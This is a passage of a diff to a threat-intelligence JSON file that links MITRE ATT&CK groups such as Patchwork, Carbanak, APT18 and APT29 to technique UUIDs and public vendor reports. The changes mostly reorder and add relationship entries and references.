"estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "1608f3e1-598a-42f4-a01a-2e252e81728f", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "f44731de-ea9f-406d-9b83-30ecbb9b4392", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "33b9e38f-103c-412d-bdcf-904a91fff1e4", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "92d7da27-2d91-488e-a00c-059dc162766d", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "d28ef391-8ed4-45dc-bc4a-2f43abf54416", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "7fcbc4e8-1989-441f-9ac5-e7b6ff5806f1", "tags": [ @@ -5136,6 +5997,20 @@ ], "type": "uses" }, + { + "dest-uuid": "2e45723a-31da-4a7e-aaa6-e01998a6788f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "e3cedcfe-6515-4348-af65-7f2c4157bf0d", "tags": [ @@ -5143,6 +6018,34 @@ ], "type": "uses" }, + { + "dest-uuid": "15dbf668-795c-41e6-8219-f0447c0e64ce", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "1608f3e1-598a-42f4-a01a-2e252e81728f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "tags": [ @@ -5151,21 +6054,7 @@ "type": "uses" }, { - "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -5179,7 +6068,49 @@ "type": "uses" }, { - "dest-uuid": "03342581-f790-4f03-ba41-e82e67392e23", + "dest-uuid": "ffe742ed-9100-4686-9e00-c331da544787", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "10d51417-ee35-4589-b1ff-b6df1c334e8d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "4664b683-f578-434f-919b-1c1aad2a1111", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "294e2560-bd48-44b2-9da2-833b5588ad11", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "33b9e38f-103c-412d-bdcf-904a91fff1e4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -5191,6 +6122,97 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "d28ef391-8ed4-45dc-bc4a-2f43abf54416", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "92d7da27-2d91-488e-a00c-059dc162766d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b77b563c-34bb-4fb8-86a3-3694338f7b47", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "03342581-f790-4f03-ba41-e82e67392e23", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f44731de-ea9f-406d-9b83-30ecbb9b4392", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "6713ab67-e25b-49cc-808d-2b36d4fbc35c", @@ -5289,13 +6311,6 @@ ], "type": "uses" }, - { - "dest-uuid": "ff6caf67-ea1f-4895-b80e-4bb0fc31c6db", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "afc079f3-c0ea-4096-b75d-3f05338b7f60", "tags": [ @@ -5310,6 +6325,13 @@ ], "type": "uses" }, + { + "dest-uuid": "ff6caf67-ea1f-4895-b80e-4bb0fc31c6db", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "tags": [ @@ -5317,6 +6339,13 @@ ], "type": "uses" }, + { + "dest-uuid": "c2ffd229-11bb-4fd8-9208-edbe97b14c93", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "9108e212-1c94-4f8d-be76-1aad9b4c86a4", "tags": [ @@ -5331,13 +6360,6 @@ ], "type": "uses" }, - { - "dest-uuid": "c2ffd229-11bb-4fd8-9208-edbe97b14c93", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "fddd81e9-dd3d-477e-9773-4fb8ae227234", "tags": [ @@ -5356,13 +6378,13 @@ "refs": [ "https://attack.mitre.org/groups/G0040", "https://s3-us-west-2.amazonaws.com/cymmetria-blog/public/Unveiling_Patchwork.pdf", - "https://securelist.com/the-dropping-elephant-actor/75328/", "http://www.symantec.com/connect/blogs/patchwork-cyberespionage-group-expands-targets-governments-wide-range-industries", + "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf", + "https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/", + "https://securelist.com/the-dropping-elephant-actor/75328/", "https://researchcenter.paloaltonetworks.com/2018/03/unit42-patchwork-continues-deliver-badnews-indian-subcontinent/", "https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf", - "http://enterprise-manage.norman.c.bitbit.net/resources/files/Unveiling_an_Indian_Cyberattack_Infrastructure.pdf", - "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf", - "https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/" + "http://enterprise-manage.norman.c.bitbit.net/resources/files/Unveiling_an_Indian_Cyberattack_Infrastructure.pdf" ], "synonyms": [ "Patchwork", @@ -5395,14 +6417,7 @@ "type": "uses" }, { - "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "dest-uuid": "d1183cb9-258e-4f2f-8415-50ac8252c49e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -5416,49 +6431,7 @@ "type": "uses" }, { - "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "00d0b012-8a03-410e-95de-5826bf542de6", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "85b39628-204a-48d2-b377-ec368cbcb7ca", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -5472,28 +6445,7 @@ "type": "uses" }, { - "dest-uuid": "6aac77c4-eaf2-4366-8c13-ce50ab951f38", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "30208d3e-0d6b-43c8-883e-44462a514619", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "d54416bd-0803-41ca-870a-ce1af7c05638", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "519630c5-f03f-4882-825c-3af924935817", + "dest-uuid": "edbe24e9-aec4-4994-ac75-6a6bc7f1ddd0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -5507,21 +6459,7 @@ "type": "uses" }, { - "dest-uuid": "ca1a3f50-5ebd-41f8-8320-2c7d6a6e88be", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "51dea151-0898-4a45-967c-3ebee0420484", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7", + "dest-uuid": "d54416bd-0803-41ca-870a-ce1af7c05638", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -5535,7 +6473,7 @@ "type": "uses" }, { - "dest-uuid": "d742a578-d70e-4d0e-96a6-02a9c30204e6", + "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -5549,28 +6487,7 @@ "type": "uses" }, { - "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "f5352566-1a64-49ac-8f7f-97e1d1a03300", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "d1183cb9-258e-4f2f-8415-50ac8252c49e", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -5583,76 +6500,6 @@ ], "type": "uses" }, - { - "dest-uuid": "6ff403bc-93e3-48be-8687-e102fdba8c88", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "20138b9d-1aac-4a26-8654-a36b6bbf2bba", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "edbe24e9-aec4-4994-ac75-6a6bc7f1ddd0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "13cd9151-83b7-410d-9f98-25d0f0d1d80d", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "da04ac30-27da-4959-a67d-450ce47d9470", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "830c9528-df21-472c-8c14-a036bf17d665", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ @@ -5660,6 +6507,13 @@ ], "type": "uses" }, + { + "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "b2001907-166b-4d71-bb3c-9d26c871de09", "tags": [ @@ -5667,6 +6521,41 @@ ], "type": "uses" }, + { + "dest-uuid": "30208d3e-0d6b-43c8-883e-44462a514619", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "519630c5-f03f-4882-825c-3af924935817", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "d742a578-d70e-4d0e-96a6-02a9c30204e6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "ca1a3f50-5ebd-41f8-8320-2c7d6a6e88be", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "e9595678-d269-469e-ae6b-75e49259de63", "tags": [ @@ -5674,12 +6563,145 @@ ], "type": "uses" }, + { + "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "00d0b012-8a03-410e-95de-5826bf542de6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "6ff403bc-93e3-48be-8687-e102fdba8c88", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f5352566-1a64-49ac-8f7f-97e1d1a03300", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "6aac77c4-eaf2-4366-8c13-ce50ab951f38", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "13cd9151-83b7-410d-9f98-25d0f0d1d80d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "20138b9d-1aac-4a26-8654-a36b6bbf2bba", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "85b39628-204a-48d2-b377-ec368cbcb7ca", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "da04ac30-27da-4959-a67d-450ce47d9470", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "e494ad79-37ee-4cd0-866b-299c521d8b94", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "51dea151-0898-4a45-967c-3ebee0420484", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "830c9528-df21-472c-8c14-a036bf17d665", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "17862c7d-9e60-48a0-b48e-da4dc4c3f6b0", @@ -5692,8 +6714,8 @@ "refs": [ "https://attack.mitre.org/groups/G0008", "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064518/Carbanak_APT_eng.pdf", - "https://www.fox-it.com/en/about-fox-it/corporate/news/anunak-aka-carbanak-update/", "https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html", + "https://www.fox-it.com/en/about-fox-it/corporate/news/anunak-aka-carbanak-update/", "https://www.crowdstrike.com/blog/state-criminal-address/" ], "synonyms": [ @@ -5731,6 +6753,13 @@ ], "type": "uses" }, + { + "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "afc079f3-c0ea-4096-b75d-3f05338b7f60", "tags": [ @@ -5738,20 +6767,6 @@ ], "type": "uses" }, - { - "dest-uuid": "2e0dd10b-676d-4964-acd0-8a404c92b044", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "5a63f900-5e7e-4928-a746-dd4558e1df71", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790", "tags": [ @@ -5760,7 +6775,14 @@ "type": "uses" }, { - "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", + "dest-uuid": "72f54d66-675d-4587-9bd3-4ed09f9522e4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "5a63f900-5e7e-4928-a746-dd4558e1df71", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -5774,7 +6796,7 @@ "type": "uses" }, { - "dest-uuid": "72f54d66-675d-4587-9bd3-4ed09f9522e4", + "dest-uuid": "ff6caf67-ea1f-4895-b80e-4bb0fc31c6db", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -5788,7 +6810,7 @@ "type": "uses" }, { - "dest-uuid": "ff6caf67-ea1f-4895-b80e-4bb0fc31c6db", + "dest-uuid": "2e0dd10b-676d-4964-acd0-8a404c92b044", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -5953,14 +6975,14 @@ "type": "uses" }, { - "dest-uuid": "9108e212-1c94-4f8d-be76-1aad9b4c86a4", + "dest-uuid": "271e6d40-e191-421a-8f87-a8102452c201", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "271e6d40-e191-421a-8f87-a8102452c201", + "dest-uuid": "9108e212-1c94-4f8d-be76-1aad9b4c86a4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -5984,7 +7006,8 @@ "refs": [ "https://attack.mitre.org/groups/G0026", "http://www.secureworks.com/resources/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems/", - "https://www.threatstream.com/blog/evasive-maneuvers-the-wekby-group-attempts-to-evade-analysis-via-custom-rop" + "https://www.threatstream.com/blog/evasive-maneuvers-the-wekby-group-attempts-to-evade-analysis-via-custom-rop", + "https://www.anomali.com/blog/evasive-maneuvers-the-wekby-group-attempts-to-evade-analysis-via-custom-rop" ], "synonyms": [ "APT18", @@ -6022,6 +7045,13 @@ ], "type": "uses" }, + { + "dest-uuid": "e066bf86-9cfb-407a-9d25-26fd5d91e360", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "10d51417-ee35-4589-b1ff-b6df1c334e8d", "tags": [ @@ -6037,7 +7067,21 @@ "type": "uses" }, { - "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -6050,20 +7094,6 @@ ], "type": "uses" }, - { - "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e066bf86-9cfb-407a-9d25-26fd5d91e360", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "88c621a7-aef9-4ae0-94e3-1fc87123eb24", "tags": [ @@ -6071,12 +7101,61 @@ ], "type": "uses" }, + { + "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "9e2bba94-950b-4fcf-8070-cb3f816c5f4e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "38fd6a28-3353-4f2b-bb2b-459fecd5c648", @@ -6089,11 +7168,14 @@ "refs": [ "https://attack.mitre.org/groups/G0016", "https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf", + "https://www.us-cert.gov/sites/default/files/publications/JAR_16-20296A_GRIZZLY%20STEPPE-2016-1229.pdf", "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/", - "https://www.us-cert.gov/sites/default/files/publications/JAR_16-20296A_GRIZZLY%20STEPPE-2016-1229.pdf" + "https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html", + "https://www.microsoft.com/security/blog/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/" ], "synonyms": [ "APT29", + "YTTRIUM", "The Dukes", "Cozy Bear", "CozyDuke" @@ -6114,13 +7196,6 @@ ], "type": "uses" }, - { - "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", "tags": [ @@ -6128,41 +7203,6 @@ ], "type": "uses" }, - { - "dest-uuid": "9b99b83a-1aac-4e29-b975-b374950551a3", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "ff6caf67-ea1f-4895-b80e-4bb0fc31c6db", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "5e7ef1dc-7fb6-4913-ac75-e06113b59e0c", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "65370d0b-3bd4-4653-8cf9-daf56f6be830", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", "tags": [ @@ -6171,7 +7211,21 @@ "type": "uses" }, { - "dest-uuid": "1ce03c65-5946-4ac9-9d4d-66db87e024bd", + "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9b99b83a-1aac-4e29-b975-b374950551a3", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -6184,6 +7238,20 @@ ], "type": "uses" }, + { + "dest-uuid": "e906ae4d-1d3a-4675-be23-22f7311c0da4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "65370d0b-3bd4-4653-8cf9-daf56f6be830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { 